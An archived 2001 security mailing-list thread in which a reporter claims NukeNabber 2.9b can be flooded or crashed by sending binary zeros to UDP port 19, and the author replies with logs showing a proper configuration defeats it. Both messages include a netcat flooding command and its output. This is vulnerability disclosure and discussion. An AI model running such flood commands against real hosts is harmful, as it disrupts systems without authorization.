Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bugs in NukeNabber 2.9b

From: "Daniel S. Otis-Vigil" <puppet () DYNAMSOL COM>
Date: Sun, 11 Feb 2001 23:35:58 -0700
First I would like to say it would have been nice if the author of this
"bug" report had contacted me so I could tell him how to properly configure
NukeNabber.

You must set the option to "ignore" or close a port or you can flood the
display.
As you can see below, when set up properly it works fine and cannot be
flooded.

tray# nc -u -v -v 207.188.145.193 19 < /dev/zero
toast.dynamsol.com [207.188.145.193] 19 (chargen) open
 sent 84738048, rcvd 0

[02/11/2001 23:32:42.921 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.131 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.171 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.221 GMT-0700] UDP from address tray.dynamsol.com
(207.188.145.195) remote port 32272 local port 19.
[02/11/2001 23:32:43.311 GMT-0700] Port 19 (udp) is now disabled for 60
seconds.

Daniel

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of
s1gnal_9
Sent: Sunday, February 11, 2001 9:55 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Bugs in NukeNabber 2.9b


By default Nukenabber listens on port 19(udp) for connections, and gathers
information on the source address...

If we send binary zero's to it this is what we get

*sends binary zeros*
nc <target> 19 -u < /dev/zero

*this appears on nukenabber*
[02/11/2001 23:53:14.310 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:53:14.310 GMT-0500]
[02/11/2001 23:59:15.830 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:15.830 GMT-0500]
[02/11/2001 23:59:16.220 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:16.220 GMT-0500]
[02/11/2001 23:59:16.600 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:16.600 GMT-0500]


As we can see, it cannot see where the data is coming from... In the past I
have done tests and sent large amounts of data to this udp port and caused
nukenabber to crash and sometimes lock up the system.



--
_______________________________________________
Get your free email from http://sunos.com
Powered by Instant Portal
Previous By Date Next
Previous By Thread Next

Current thread: